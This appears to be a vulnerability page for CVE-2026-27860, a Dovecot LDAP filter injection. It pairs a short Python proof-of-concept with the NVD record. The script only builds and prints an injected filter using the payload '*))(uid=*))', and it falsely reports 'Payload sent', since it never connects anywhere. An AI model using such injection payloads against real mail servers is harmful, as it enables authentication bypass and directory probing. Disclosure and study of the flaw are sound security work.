CVE-2026-27860

# PoC for CVE-2026-27860 # Concept: Demonstrating how an empty auth_username_chars allows LDAP injection. # This is a simulation of the payload structure. import socket # Target configuration (hypothetical) host = '192.168.1.10' port = 143 # IMAP port # Malicious payload designed to bypass logic or probe structure # If auth_username_chars is empty, this string is passed directly to the LDAP filter. # Example payload: *))(uid=*)) # This attempts to make the filter always true or match specific attributes. malicious_username = '*))(uid=*))' # Simulation of the LDAP filter construction in Dovecot (Vulnerable logic) # Normal: (&(objectClass=posixAccount)(uid=%s)) # Vulnerable with empty auth_username_chars: # The input is not sanitized. constructed_filter = f"(&(objectClass=posixAccount)(uid={malicious_username}))" print(f"[+] Constructing LDAP Filter with malicious input...") print(f"[+] Filter: {constructed_filter}") # If the server accepts this, it may return the first user entry or error out, # leaking information about the LDAP structure. print(f"[+] Payload sent: USER {malicious_username}") print(f"[!] If auth_username_chars is empty, this may bypass restrictions or probe LDAP.")

{"cve": {"id": "CVE-2026-27860", "sourceIdentifier": "[email protected]", "published": "2026-03-27T09:16:20.383", "lastModified": "2026-04-29T19:26:19.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "If auth_username_chars is empty, it is possible to inject arbitrary LDAP filter to Dovecot's LDAP authentication. This leads to potentially bypassing restrictions and allows probing of LDAP structure. Do not clear out auth_username_chars, or install fixed version. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.3", "matchCriteriaId": "BE209329-C5EA-4EE7-A23E-CD2EC061A9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionEndExcluding": "3.1.4", "matchCriteriaId": "108C2329-C70B-4056-AB01-80AEB7CF3912"}]}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}